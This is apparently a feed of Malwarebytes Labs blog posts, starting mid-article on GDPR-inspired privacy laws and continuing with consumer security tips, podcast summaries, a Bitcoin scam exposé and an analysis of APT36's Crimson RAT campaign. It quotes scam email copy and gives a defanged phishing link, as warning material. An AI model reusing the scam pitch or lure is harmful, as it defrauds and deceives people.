“At a high level, there’s a huge amount of movement in the privacy world,” de La Lama said, “and, without a doubt, the GDPR has been a huge driver.”

The following laws and bills are a sample of the many global efforts to bring data privacy home. Often, the newer laws and legislation are influenced by GDPR, but several countries that passed data privacy laws before GDPR are still working to update their own rules to integrate with the EU.

This is GDPR around the world.

South America

Several countries in South America already grant stronger data protection rights to their public than in the United States, with several enshrining a right to data protection in their constitutions.

In 2018, Chile joined that latter club, supplementing its older, constitutional right to privacy with a new right to data protection. The constitution now says:

“The Constitution ensures to every person: … The respect and protection of private life and the honor of the person and his family, and furthermore, the protection of personal data. The treatment and protection of this data will be put into effect in the form and conditions determined by law.”

That last reference to “conditions determined by law” matters deeply to Chileans’ actual data protection rights because even though the Constitution protects data, it does not specify how that data should be protected.

Think of it like the US Constitution, which, for instance, protects US persons against unreasonable searches. Only within the past few decades, however, have courts and lawmakers interpreted whether “unreasonable searches” include, for instance, searches of emails sent through a third-party provider, or searches of historical GPS data tracked by a mobile phone.

Now, Chile is working to determine what its data protection rights will actually include, with a push to repeal and replace a decades-old data protection law called the “Personal Data Protection Act,” or Act No. 19.628. The latest legislative efforts include a push to include the rights to request, modify, and delete personal data, along with the right to withdraw consent from how a company collects, stores, writes, organizes, extracts, transfers, and transmits personal data.

Revamping older data protections is not unique to Chile.

Argentina implemented its Personal Data Protection Law (PDPL) in 2000. But that law, unlike Chile’s, drew inspiration from the European Union long before the passage of GDPR. Instead, Argentina’s lawmakers aligned their legislation with the law that GDPR repealed and replaced—Data Protection Directive of 1995.

This close relationship between Argentinian and European data protection law made Argentina a near shoe-in for the GDPR’s so-called “whitelist,” a list of countries outside the European Union that have been approved for easier cross-country data transfers because of those countries’ “adequate level of data protection.” This status can prove vital for countless companies that move data all around the world.

According to the European Commission, countries that currently enjoy this status include Andorra, Argentina, Canada (for commercial organizations), the Faroe Islands, Guernsey, Israel, Isle of Man, Japan, Jersey, New Zealand, Switzerland, and Uruguay. The US is also included, so long as data transfers happen under the limited Privacy Shield framework—an agreement that replaced the previous, separate data transfer agreement called “Safe Harbor,” which itself was found invalid by the Court of Justice for the European Union.  

(Privacy Shield also faces challenges of its own, so maybe the US should not get too comfortable with its status.)

Despite Argentina’s current whitelist status with the European Commission, the country is still trying to update its data protection framework with a new piece of legislation.

The new bill, Bill No. MEN-2018-147-APN-PTE, was introduced to Argentina’s Congress in September 2018. Its proposed changes include allowing the processing of sensitive data with approved consent from a person, expanding the territorial reach of personal data protections, creating new rules for when to report data breaches to the country’s data regulator, and drastically increasing the sanctions for violating the law.

Within South America, there is still at least one more country influenced by GDPR.

In August 2018, Brazil’s then-president Michel Temer signed the country’s General Data Privacy Law (“Lei Geral de Proteção de Dados Pessoais” or LGPD). The law comes into effect August 2020.

The similarities to GDPR are many, de La Lama said.

“Like the GDPR, the new law, when it comes into effect, applies extraterritorially, contains notice and consent and cross-border transfer requirements as well as obligations with regard to data subject rights and data protection officer appointment,” de La Lama said. “EU Standard Contractual clauses may be recognized under the new law but this step has not yet been taken.”

The LGPD defines “sensitive data” as personal data that reveals racial or ethnic origin, political opinions, religious or philosophical beliefs, and trade union membership, along with genetic data, biometric data used for uniquely identifying a natural person, health and medical information, and data concerns a person’s sex life or sexual orientation.

Similar to GDPR, Brazil’s LGPD also creates a distinction between data controllers or owners, and data processors, a framework that has quickly rolled out in proposed laws around the world, including the United States. Brazil’s LGPD also applies beyond the country’s borders. The law applies to companies and organizations that offer goods or services to those living within Brazil, much like how GDPR applies to companies that direct marketing towards those living inside the European Union.

The law also, following amendments, includes the creation of the Brazilian Data Protection Authority. That body will have the sole authority to issue regulations and sanctions for organizations that violate the law because of a data breach.  

India

In late 2019, India’s lawmakers introduced a data protection law two years in the making, which included minor similarities to the EU’s GDPR. The Personal Data Protection Bill of 2019, or PDPB, would require international companies to seek the consent of India’s public for many uses of personal data, and grant the people a new right to have their data erased.

The similarities stop there.

While portions of the law feint the main purpose of GDPR, the data protections actually included suffer from an enormous loophole. As written, though the law’s data restrictions apply to government agencies, the law also allows the newly-created data protection authority to pick any government agency that it wants exempted.

The law would permit New Delhi to “exempt any agency of government from application of Act in the interest of sovereignty and integrity of India, the security of the state, friendly relations with foreign states, public order,” according to an early, leak draft of the law obtained by TechCrunch.

This exceptionally broad language is akin to any loophole in the United States that applies to “national security,” and it is one that digital rights activists in India are fighting.

“This is particularly concerning in India given that the government is the largest collector of data,” said Apar Gupta, executive director of the Internet Freedom Foundation, in talking to the New York Times.

Salman Waris, who leads the technology practice at the New Delhi law firm TechLegis, also told the New York Times that the new Indian law purports to protect the public while actually accomplishing something else.

“It gives a semblance of owning your data, and having the right to know how it is used, to the individual,” Waris said, “but at the same time it provides carte blanche to the government.”

GDPR in the United States

Though we’ve focused on GDPR’s impact on a global scale, it is impossible to deny the influence felt at home in the United States.

While Congress’s efforts to pass a comprehensive data privacy law date back to the Cambridge Analytica scandal of 2018, some of the ideas embedded in more current data privacy legislation relate directly to GDPR.

One clear example is the California Consumer Privacy Act (CCPA), said Sarah Bruno, partner at Reed Smith who works at the intersection of intellectual property, privacy, and advertising. Though the law was signed less than one month after GDPR took effect in the EU, it was drafted with more than enough time to borrow from GDPR after that law’s earlier approval, in 2016.

“GDPR did have an impact on CCPA,” Bruno said, “and it has a lot of components in CCPA.”

CCPA grants Californians the rights to access and delete data, the right to take their data and port it to a separate provider, along with the right to know what data about them is being collected. Californians also enjoy the explicit right to opt out of having their data sold, which is not verbatim included in GDPR, though that law does give residents protections that could result in a similar outcome. And though CCPA does not grant rights to “data subjects,” as written in GDPR, it does have a similar scope of effect. Much of the law is about giving consumers access to their own information.

“Consumers are able to write to a company, similar to GDPR, to find out what information [the company] is collecting on them, via cookies, about their purchase history, what they’re looking at on websites when on there,” Bruno said. She added that CCPA contends that “all that information, a California consumer should have access to that, and that’s new in the US, but similar to GDPR.”

But California is just one state inspired by GDPR. There’s also Washington, which, earlier this year, introduced a remodeled version of its Data Privacy Act.

“It’s similar as well to CCPA,” Bruno said about Washington’s revamped bill. “As I call it, CCPA plus.”

The Data Privacy Act scores close to GDPR, in that it borrows some of the EU law’s language on data “controllers” and “processors,” which would both receive new restrictions on how personal data is collected and shared. The law, much like GDPR, would also provide Washingtonians with the rights to access, control, delete, and port their data. Much like CCPA, the Data Privacy Act would also let residents specifically opt out of data sales.

Though the bill initially drew a warm welcome from Microsoft and the Future of Privacy Forum, shortly after, Electronic Frontier Foundation opposed the legislation, calling it a “weak, token effort at reining in corporations’ rampant misuse of personal data.”

The bill, introduced on January 13 this year, has not moved forward.

GDPR’s legacy: Fines or fatigue?

GDPR’s passage came with a clear warning sign to potential violators—break the law and face fines of up to 2 percent of global revenue. For an Internet conglomerate like Alphabet, which owns Google, such an enforcement action would mean paying more than a billion dollars. The same is true for Apple, Facebook, Amazon, Verizon, and AT&T, just to name a few.

Despite having the tools to hand down billion-dollar penalties, authorities across Europe were initially shy to use them. In early January 2019, France’s National Data Protection Commission (CNIL) slapped a €50 million penalty against Google after investigators found a “lack of transparency, inadequate information and lack of valid consent regarding the ads personalization.” It was the largest penalty at the time, but it paled in comparison to what GDPR allowed: Based on Alphabet’s 2018 revenue, it could have received a fine of about €2.47 billion, or $2.72 billion in today’s dollars.

Six months later, regulators leaned more heavily into their powers. In July 2019, the Information Commissioner for the United Kingdom (which was at the time still a member of the European Union) fined British Airways $230 million because of an earlier data breach that affected 500,000 customers. The penalty represented 1.5 percent of the airline’s 2018 revenue.

But regulatory fines tell just one side of GDPR’s story, because, as de La Lama said, after the law’s passage, her clients tell her of fatigue in trying to comply with every new law.

The nuances between each country’s data protection laws have produced guide after guide from multiple, global law firms, each attacking the topic with their own enormous tome of information. De la Lama’s own law firm, Baker McKenzie, released its annual, global data protection guide last year, clocking in at 886 pages. A quick glance reveals the subtle but important differences between the world’s laws: Countries that adopt a framework that separates data restrictions between “controllers” and “processors,” countries that protect “consumers” versus “data subjects,” countries that require data breaches to be reported to data protection authorities, countries that create data protection authorities, and countries that differ on just what the hell personal information includes.

Complying with one data protection law can be hard enough, de La Lama said, and there’s little assurances that the current data privacy movement is coming to a close.

“There’s difficulty in trying to bring a company into compliance with a wide variety of privacy and technical specifications and finding internal resources to do that is a daunting task,” de la Lama said. “And when you’re trying to replicate that across multiple jurisdictions, we’re seeing a lot of companies just trying to wrap their arms around how to do that, knowing that GDPR isn’t the end game, but really just the start.”

The post GDPR: An impact around the world appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Important tips for safe online shopping post COVID-19

Malwarebytes - Tue, 03/31/2020 - 18:57

As more and more countries order their citizens inside in response to COVID-19, online shopping—already a widespread practice—has surged in popularity, especially for practical items like hand sanitizer, groceries, and cleaning products. When people don’t feel safe outside, it’s only natural they’d prefer to shop as much as possible from the safety of their own homes. Unfortunately, you can bet your last toilet paper roll that cybercriminals anticipated the rush and were ready to take advantage of our need to buy supplies of all kinds online.

Because we know how cybercriminals think and have already seen an uptick in web skimmers and coronavirus scams, we wanted to prepare our readers for a safer online shopping experience. We have rounded up some tips for staying secure, as well as some landmines to avoid during your online shopping spree.

Dangers to avoid while shopping online

There are a few dangers that always lurk for online shoppers, and some of them increase in severity during particular events, such as holidays or summer travel season, known shopping periods like Cyber Monday or Singles’ Day, or tragic incidents, including natural disasters and the current global pandemic. Here are a few red flags to watch out for:

Raised prices

It’s only natural to expect a small raise in prices as some companies cope with economic fallout from closing brick-and-mortar shops and lack of personnel. Combine that with an increase in demand for specific items, plus the increased cost of delivery to compensate for added danger, and the totals at checkout are probably creeping up all over the place. But it’s one thing to raise prices responsibly. It’s quite another to price gouge, and cybercriminals and scammers are opting for the latter to profit from misfortune.

During times like these, it’s easy to click “purchase” on the first webpage peddling scarce or highly sought-after commodities. For example, two brothers tried to make a fortune selling hand sanitizer for $70 per bottle. People were desperate enough to buy before the attorney general shut down the site. But don’t fall for the hype. Take a deep breath and research an item before jumping at the first opportunity to purchase.

Pro tip: If a price seems wildly out of line, open up a new tab on your browser and search the item name and pricing. You can also check sites such as Tom’s Guide or Consumer Reports for fair prices.

Delays in delivery time

If items are scarce, there may be a long waiting time before delivery. Know your rights in case a supplier can’t deliver within the agreed time frame, and don’t fall for scammers promising they can help you cut the line. Usually, you can claim a refund if the article doesn’t arrive by the date you were promised. But a scammer couldn’t care less about your claims for a refund. They will make sure they are nowhere to be found when the claims come in and the going gets rough.

Pro tip: Search a website’s customer service page to find out delivery and return policies before purchasing, especially items in short storage. Typically, these policies are found on shipping, support, help, or FAQ webpages.

Counterfeit goods

Selling counterfeit goods is another common type of web crime that will likely see an uptick during the coronavirus pandemic. From a photograph it is nearly impossible to tell whether an item is faux or the real deal. For all we know, the scammer could put a picture of the original on their site and ship you a cheap replica—or nothing at all. A good rule of thumb is: If it’s too good to be true, it usually isn’t.

Pro tip: Check the reviews of the seller, reseller, and product—not just on the site, but in a separate search. If someone has been duped before, chances are, they’ll post pictures or a review.

Web skimmers

Ever since shelter-in-place orders have sent millions of shoppers online, the Malwarebytes threat intelligence team has noticed an uptick in the amount of digital credit card skimmers, also known as web skimmers. Web skimmers are placed on shopping cart pages and collect the payment data that customers enter when they purchase an item online.

Cybercriminals can hack the websites of legitimate brands to insert web skimmers, so avoiding resellers or little-known boutiques won’t protect shoppers from web skimmers. Instead, consider using an antivirus with web protection or browser extensions that block malicious content.

Jérôme Segura, Malwarebytes Director of Threat Intelligence is an internationally renowned expert on web skimmers. He was kind enough to share some of his knowledge with us:

“The vast majority of people, including those familiar with computers, would not be able to see that an online merchant has been hacked and that a skimmer is going to harvest their information.

But there are certain things you can do to minimize risks. For example, check that the site looks up to date by looking at things such as copyright information. If it says something like Copyright 2015, this may be an indication that the site owner is not paying attention to details.

I also believe it’s essential to use some kind of web protection. Based on our telemetry, we stop hundreds of attempts to steal credit card data on a daily basis by blocking malicious domains and IP addresses associated with web skimming infrastructure.”

Pro tip: Keep an eye on your bank account for unexpected payments, and know what to do when your information has been stolen.

Recommended reading: How to protect your data from Magecart and other e-commerce attacks

Precautions and possible pitfalls

While not outright dangers, there are a few somewhat shady behaviors that could signal further trouble down the road. Here are a few you might want to avoid or take into account when you consider online shopping.

Security certificates

A significant surge in the number of requested security certificates indicates that more fraudulent websites are being created. As we have mentioned before on the blog, the green padlock alone does not guarantee a safe site. Free or cheap security certificates are an indication that the site might be fraudulent or built without any attention to real security.

Use trusted sites and visit them directly, not through a search. Using legitimate sites with a good reputation does have obvious advantages. You know it’s a real shop and they deliver on what they promise.

Pro tip: Bookmark favorite URLs to save on manually typing. By saving the URL rather than searching for a shop name, you are less likely to be fooled by impersonators.

Targeted ads

Targeted advertising should not be rewarded. Usually it’s better to ignore it. Pretty much for the same reasons as above. Visit the site directly instead of clicking a link in your Facebook feed. Since many shops use cookies for targeted advertising, they will soon pick up that you are looking for a certain item and try to lure you to site by offering it to you in your timeline.

Pro tip: Consider purchasing insurance for high-value products. With insurance, you can at least get your money back if your purchase never arrives or is damaged or otherwise below expectations. Insurance does not have to be expensive. PayPal and many credit cards offer this service free of charge.

Information overload

Be wary of web shops asking you for information they don’t need to service you. They might be up to no good. And even if they are not, they have no right asking you for details that are unnecessary for the shopping and delivery process. Even if they do not plan to sell your data to third parties, they may experience a breach and spill your personal information anyway.

Pro tip: Only fill in required sections of any data forms for an online purchase. And if a form starts asking for social security numbers, pet’s names, or other weirdly personal information, do not enter the content and back out of the purchase.

Recommended reading: 10 tips for safe online shopping on Cyber Monday

Preventative measures

As always, it’s important to take the normal security precautions while shopping online. These include the following:

  • Use up-to-date software, especially your operating system and your browser. Check that both are updated before you venture online.
  • Disregard overly aggressive pop-ups, push notifications, and other annoying cries for attention. Usually, unsolicited advice in the form of persistent advertisements, browser extension downloads, coupon programs, and other assorted spam are aiming for trickery and not actually trying to help.
  • Pay extra attention when using public Wi-Fi, and avoid making payments while you are on unprotected Wi-Fi.
  • Where possible, use a VPN during online shopping. A good VPN will encrypt the traffic between you and the online shop, so nobody can spy on it.

Stay safe, everyone!

The post Important tips for safe online shopping post COVID-19 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Lock and Code S1Ep3: Dishing on data privacy with Adam Kujawa

Malwarebytes - Mon, 03/30/2020 - 16:33

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Adam Kujawa, a director of Malwarebytes Labs, about the state of data privacy today, including how users and businesses can protect sensitive information when there are few laws to help them out, and whether we could foresee the many problems with today’s rampant data sharing when we first built the Internet.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research: Plus other cybersecurity news:
  • Housing association spills data: A “please update your details” missive has horrible data exposure consequences for a UK-based organization. (Source: The Register)
  • The age-old problem of password reuse: Shockingly, it’s a problem for Fortune 500 companies, too. (Source: Help Net Security)
  • Homework equals router mayhem: With many worldwide retreating to their home environment, it figures that hackers would follow them there. (Source: Cyberscoop)
  • Compromised news sites lead to malware: A variety of backdoor files are offered up by hijacked news portals. (Source: Bleeping Computer)
  • Netflix and phish: The increase in work-from-home employees is also giving rise to a bump in attacks on streaming services. (Source: RapidTV News)

Stay safe, everyone!

The post Lock and Code S1Ep3: Dishing on data privacy with Adam Kujawa appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Coronavirus Bitcoin scam promises “millions” working from home

Malwarebytes - Thu, 03/26/2020 - 17:05

In the last week, we’ve seen multiple coronavirus scams pushed by bad actors, including RAT attacks via fake health advisories, bogus e-books working in tandem with Trojans, and lots of other phishing shenanigans. Now we have another one to add to the ever-growing list: dubious coronavirus Bitcoin missives landing in your inbox.

Reworking a classic spam tactic

This is a retooling of an older spam run involving British comedian Jim Davidson, the older form of which was seen bouncing around in November 2019. As they put it, “Jim Davidson bounced back from bankruptcy with Bitcoin.” Even before that, in the first half of 2019, he was being used alongside other well-known British celebrities such as Jamie Oliver and daytime TV presenters to promote a variety of misleading Bitcoin get-rich schemes. This is common for Bitcoin scams, and you can dip into any year you like and find a few of these floating around at any given time.

What do we have this time?

In short, these coronavirus Bitcoin scams are older attempts to have people part with their cash hastily retooled to make hay with the current global pandemic. It’s incredibly lazy—the landing pages and follow on websites seem to be untouched from whenever they first appeared. The only new ingredient is the email content mentioning coronavirus, but sadly, that’s often more than enough to have people part with their money.

Click to enlarge

It begins with a non-stop drip-feed of emails, from many different addresses pumping out spam. In the above mailbox, it’s a total of 11 in six days. All of the email addresses are rather optimistically called “coronavirus positives”, letting you know that staying at home thanks to a global pandemic can actually make you rich beyond your wildest dreams.

Some of the subject lines read as follows:

Staying at home because of COVID-19!! Spend your time making thousands on Bitcoins. 

The positive impact of staying home (Corona-virus), Make thousand a day trading Bitcoin.

Join 1000s of Brits making 1000s a day. Bitcoin is back – and this time you can make a million.

Without a larger sample selection to go from, we can’t say which missive is the most popular subject line, but the one mentioning “work from home” is at least the most popular in this particular mailbox and a few others that we’ve seen. 

Coronavirus Bitcoin email style

The emails are formatted in much the same way, emulating the British newspaper “red top” style—most specifically, The Sun.

Here’s the text from one of the samples we looked at:

Click to enlarge

Click to enlarge

The text reads as follows:

Jim Davidson Reveals How He Bounced Back After The Bankruptcy – He claims anyone can do it & shows ‘Good Morning Britain’ How!

Appearing on ‘Good Morning Britain’ show, Jim Davidson, a man who has recovered from Bankruptcy thanks to an automated Bitcoin trading platform, called BTC Profit . The idea was simple: allow the average person the opportunity to cash in on the Bitcoin boom. Even if they have absolutely no investing or technology experience.

A user would simply make an initial deposit into the platform, usually of £200 (or $250, as the platform works with USD) or more, and the automated trading algorithm would go to work. Using a combination of data and machine learning, the algorithm would know the perfect time to buy Bitcoin low and sell high, maximising the user’s profit.

To demonstrate the power of the platform Jim had Kate Garraway deposited £200 on the live show.

Here’s one that emulates The Sun to a high degree, complete with almost-but-not-quite name using the same font as the well-known newspaper:

Click to enlarge

In the above mail, a student reveals how “he earns more than £40,000 every month working from home.” Some of the links are now seemingly broken, and a few redirect to Google or random shopping sites such as the below if you presumably visit from a region they’re not interested in:

Click to enlarge

Not all of the links are broken, however. A few will indeed lead you to the supposed Bitcoin promised land.

Getting rich quick?

What you’ll see on a live page is essentially a rehash of the information in the email, complete with a few more familiar faces from UK daytime television. At this point, the coronavirus hook has been entirely abandoned:

Click to enlarge

Click to enlarge

After a lot of urging the visitor to sign up to some sort of wonderful Bitcoin system, clicking the links will finally take them to the end game:

Click to enlarge

It’s a landing page promoting something called “Bitcoin Revolution.” This has been around for a while, usually in relation to dubious ads featuring the previously mentioned celebrities.

Access is given to a trading platform, a fair amount of money is deposited into it over time, an “investment manager” asks you to deposit their commission into a bank account so they can release your funds, and…oh dear. This is the part where people report the funds never arrive and now they’re massively out of pocket.

Profiting from chaos

Endlessly spamming these “get rich quick” emails to people in normal circumstances is bad enough, but jumping on the coronavirus bandwagon to claim people can make a fortune from working from home is dreadful. This is absolutely the worst time to end up losing a significant amount of savings—they may prove to be absolutely essential further down the line.

If you receive one of these mails and they’re not automatically placed into your spam folder, report, delete, and move on. We have a feeling you won’t be making your millions from this one.

The post Coronavirus Bitcoin scam promises “millions” working from home appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Child identity theft, part 2: How to reclaim your child’s identity

Malwarebytes - Tue, 03/17/2020 - 16:33

In a world where children as young as a single day old can fall prey to fraud, it is more important than ever to educate parents and other caretakers about the dangers of child identity theft. While the hope is that perceptions can be changed and criminals brought to justice, likely the biggest concern for parents is how to reclaim their child’s identity, should they ever be in such an unfortunate position.

That is, unless the parents or guardians are the ones behind the fraud in the first place. In part 1 of our series on child identity theft, we talked about familiar fraud—fraud committed by someone who personally knows the victim—and how children are increasingly being targeted for this crime. We also touched on the repercussions of familiar fraud in the lives of kids and their families.

In part 2 of our series, we look at turning back the tables and reclaiming your child’s identity, whether it’s been stolen by a stranger or someone who knows them. In addition, we highlight the signs your child’s information might be compromised and how parents or guardians can better protect their data.

Signs of child identity compromise

When it comes to figuring out if a child’s identity has been compromised and is being used, thankfully, there are telltale signs that parents and guardians can look out for. These signs are displayed both in the real world and the digital world. They include:

  • Physical mail arriving to your home that is addressed to your child. These include card applications, banking statements, and credit card or insurance applications for accounts under their name, and they’re the most obvious sign of compromise. Your child may also receive a notice from the IRS either because of unpaid income taxes or having multiple tax returns filed under their SSN.
  • Phone calls received from collection agencies directed to your child.
  • If the landline has a caller ID, your child’s name may appear on it. This indicates that someone has stolen and is misusing their information.
  • A turned-down application for government benefit for your child. This is because someone with the same SSN as your child may already be benefiting from it.
  • Bank turning down an account application for a child due to the negative credit score associated with the child’s SSN.
  • Important documents of your child suddenly going missing, including their SSD card and birth certificate.
  • In addition, the Identity Theft Resource Center (ITRC) has listed several documents that may suddenly show up—or, in certain cases, not show up—that potentially give away active ID theft activity.
How to reclaim your child’s identity

Reclaiming a stolen identity takes a lot of work. This is true whether the victim is an adult or a child. And the length of time spent undoing the harm to your child’s reputation potentially correlates with how long the fraud has been taking place before it was identified and acted upon.

If you, dear parent or guardian, have seen any of the telltale signs of identity fraud, immediately contact the top credit bureaus to freeze your child’s credit until they are old enough to enter into a contract. Doing so means that these reports will be taken out of circulation.

A credit report for a child is normally non-existent, but if one is found, the parent or guardian should contact an organization that deals with child identity theft, such as the Identity Theft Report. If a parent would only like to take extra precaution, they can ask their credit reporting agencies (CRA), which are Experian, Equifax, TransUnion, or other smaller bureaus to create their child’s credit report and freeze it.

It is equally important for parents and/or guardians to keep the PIN that each of these credit unions have assigned to them.

Beyond freezing and receiving credit reports, other important steps for reclaiming your child’s identity include:

  • Contacting any companies where fraudulent accounts in your child’s name were opened. Tell the fraud department about what happened, and ask them to close the account and send a letter confirming your child isn’t liable. If necessary, send a letter explaining your child is a minor who can’t enter into contracts and attach a copy of their birth certificate.
  • For parents in the United States, contacting the Federal Trade Commission (FTC) at IdentityTheft.gov or call 877-ID-THEFT to report the fraud.
How to protect your child’s identity

In the Experian survey report mentioned in part 1 of our series, more than half of victims (63 percent) wished that their parents had done more to protect them from potential fraud. Interestingly, 61 percent of parents felt the same way.

Awareness of the risks and underlying dangers of child identity theft is something parents should be actively practicing. To avoid opening an opportunity for fraudsters to take advantage of your child’s information, here are some tips:

  • Don’t carry your child’s SSN card. There is no need—keep it safe at home instead.
  • Know when your child’s SSN is really needed when applying for something on their behalf. Schools, for example, don’t ask for a child’s SSN, so there is no need to provide it.
  • When throwing out mail or documents with your personal information or your child’s, shred them before disposing.
  • You may also want to consider getting your child another form of identification, such as a passport or a state identification card.
  • If you receive news of your child’s school getting breached, don’t hesitate to call the school and ask for more information.
  • Inquire about your child’s school directory information policy. A directory information contains a lot of personally identifiable information (PII) about a child. And sometimes, such information is shared outside of the school. Parents and/or guardians can either inform the school that they shouldn’t share their child’s information without their expressed consent, or opt out of having their information shared.
  • Keep all important documents of your child in a safe and secure place.

Early detection is key. Getting acquainted with the red flags and keeping an eye out for them would nip fraud in the bud. Not only that, it’d make reclaiming and restoring a child’s identity back a little easier—emotionally, mentally, and financially.

Half of Experian respondents with children who have been victimized by fraud have learned the hard way not to share personal information with family. Some have also started actively checking credit scores and enrolling for identity theft protection services.

The things we leave behind

It’s easy for adults to forget that, like them, children have data and information that needs protecting, too. And even if their children are too young to use a computing device, they still have digital footprints. The reason? Mom and Dad or other legal guardians leave them behind. Unfortunately, it is unavoidable.

Mom needs to schedule a doctor’s appointment for the little one’s check-up, so she uses her healthcare app. Proud dad shares short clips of his bundle of joy with Aunt Martha, who lives far away and couldn’t visit the newborn in hospital. And before all of this, Mom and Dad announced the pregnancy to all their social media channels.

Sadly, the very activities that give us joy and make tasks convenient can also leave behind breadcrumbs that identity thieves can sniff out and follow. Rarely do parents or guardians stop to think about how their sharing can impact their child’s digital life.

Take, for example, baby pictures you may have shared on social media. They may contain metadata pointing to the location where they were taken. Or when you made that public announcement about your baby on the way: Did you also reveal their name? Fraudsters can easily glean from this information the baby’s full name and location. If they don’t have the child’s SSN yet, they can easily pair it with another SSN to create a synthetic identity.

This isn’t to say that parents and/or guardians should deprive relatives and friends of your little one’s adorable moments, or avoid entering any of their children’s information online. Just be mindful when doing so. Share privately by making use of your social network’s privacy settings. Also caution or remind your relatives and friends to avoid re-sharing media you post to others without your consent.

We’re all in this together

In this age of data breaches, it is easy for us to focus on the security of our own data. But let us be aware that kids and young adults are becoming more of a target, too. Children, especially, are blank slates—a highly-prized quality for someone with access to their information and with malicious intent. Hackers are after them; yet often, it’s those that are closer to them who cause the greatest harm—sometimes without knowing they are doing it. Worse, more than one person could be fraudulently using an innocent child’s identity.

While parents and guardians are advised to be equally vigilant in protecting the data of their children—biological and adopted ones—as much as their own or anyone else’s, we encourage any other responsible adult in the family to take part. If familiar fraud becomes a family problem, it should be a family affair to thwart it off at all costs for the future of the most vulnerable in the household.

The post Child identity theft, part 2: How to reclaim your child’s identity appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Lock and Code S1Ep2: On the challenges of managed service providers

Malwarebytes - Mon, 03/16/2020 - 15:28

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to two representatives from an Atlanta-based managed service provider—a manager of engineering services and a data center architect—about the daily challenges of managing thousands of nodes and the future of the industry.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research on:
  • International Women’s Day: Is awareness of stalkerware, monitoring, and spyware apps on the rise?
  • How a Rocket Loader skimmer impersonates the CloudFlare library in a clever scheme
  • Securing the MSP: What are the best practices for vetting cybersecurity vendors?
  • Remote security, aka RemoteSec, and how to achieve on-prem security levels with cloud-based remote teams
  • How the coronavirus has impacted security conferences and events, including which were cancelled, postponed, or switched over to virtual
  • The effects of climate change on cybersecurity
Plus, other cybersecurity news:
  • FBI warning: Hackers are targeting Office 365, G Suite users with business email compromise attacks. (Source: SiliconAngle)
  • How poor IoT security is allowing the 12-year-old Conficker malware to make a comeback. (Source: ZDNet)
  • Recently discovered spear phishing emails are using HIV test results as a scare factor. (Source: ThreatPost)
  • Talkspace threatened to sue a security researcher over a bug report, and forced him to take down a blog post. (Source: TechCrunch)
  • Independent testing found Google’s Play Protect to be poor on malware protection. (Source: Forbes)
  • Researchers found thousands of fingerprint files exposed in an unsecured database. (Source: Cnet)
  • Researchers discovered a phishing page informing victims about fake Netflix service disruptions, supposedly due to problems with the victim’s payment method. (Source: Sucuri Blog)

Stay safe, everyone!

The post Lock and Code S1Ep2: On the challenges of managed service providers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

APT36 jumps on the coronavirus bandwagon, delivers Crimson RAT

Malwarebytes - Mon, 03/16/2020 - 15:00

Since the coronavirus became a worldwide health issue, the desire for more information and guidance from government and health authorities has reached a fever pitch. This is a golden opportunity for threat actors to capitalize on fear, spread misinformation, and generate mass hysteria—all while compromising victims with scams or malware campaigns.

Profiting from global health concerns, natural disasters, and other extreme weather events is nothing new for cybercriminals. Scams related to SARS, H1N1 (swine flu), and avian flu have circulated online for more than a decade. According to reports from ZDnet, many state-sponsored threat actors have already started to distribute coronavirus lures, including:

  • Chinese APTs: Vicious Panda, Mustang Panda
  • North Korean APTs: Kimsuky
  • Russian APTs: Hades group (believed to have ties with APT28), TA542 (Emotet)
  • Other APTs: Sweed (Lokibot)

Recently, the Red Drip team reported that APT36 was using a decoy health advisory document to spread a Remote Administration Tool (RAT).

APT36 is believed to be a Pakistani state-sponsored threat actor mainly targeting the defense, embassies, and the government of India. APT36 performs cyber-espionage operations with the intent of collecting sensitive information from India that supports Pakistani military and diplomatic interests. This group, active since 2016, is also known as Transparent Tribe, ProjectM, Mythic Leopard, and TEMP.Lapis.

APT36 spreads fake coronavirus health advisory

APT36 mainly relies on both spear phishing and watering hole attacks to gain its foothold on victims. The phishing email is either a malicious macro document or an rtf file exploiting vulnerabilities, such as CVE-2017-0199.

In the coronavirus-themed attack, APT36 used a spear phishing email with a link to a malicious document (Figure 1) masquerading as the government of India (email.gov.in.maildrive[.]email/?att=1579160420).

Figure 1: Phishing document containing malicious macro code

We looked at the previous phishing campaigns related to this APT and can confirm this is a new phishing pattern from this group. The names used for directories and functions are likely Urdu names.

The malicious document has two hidden macros that drop a RAT variant called Crimson RAT. The malicious macro (Figure 2) first creates two directories with the names “Edlacar” and “Uahaiws” and then checks the OS type.

Figure 2: malicious macro

Based on the OS type, the macro picks either a 32bit or 64bit version of its RAT payload in zip format that is stored in one of the two textboxes in UserForm1 (Figure 3).

Figure 3: embedded payloads in ZIP format

Then it drops the zip payload into the Uahaiws directory and unzips its content using the “UnAldizip” function, dropping the RAT payload into the Edlacar directory. Finally, it calls the Shell function to execute the payload.

Crimson RAT

The Crimson RAT has been written in .Net (Figure 4) and its capabilities include:

  • Stealing credentials from the victim’s browser
  • Listing running processes, drives, and directories on the victim’s machine
  • Retrieving files from its C&C server
  • Using custom TCP protocol for its C&C communications
  • Collecting information about antivirus software
  • Capturing screenshots
Figure 4: Crimson RAT

Upon running the payload, Crimson RAT connects to its hardcoded C&C IP addresses and sends collected information about the victim back to the server, including a list of running processes and their IDs, the machine hostname, and its username (Figure 5).

Figure 5: TCP communications Ongoing use of RATs

APT36 has used many different malware families in the past, but has mostly deployed RATs, such as BreachRAT, DarkComet, Luminosity RAT, and njRAT.

In past campaigns, they were able to compromise Indian military and government databases to steal sensitive data, including army strategy and training documents, tactical documents, and other official letters. They also were able to steal personal data, such as passport scans and personal identification documents, text messages, and contact details.

Protection against RATs

While most general users needn’t worry about nation-state attacks, organizations wanting to protect against this threat should consider using an endpoint protection system or endpoint detection and response with exploit blocking and real-time malware detection.

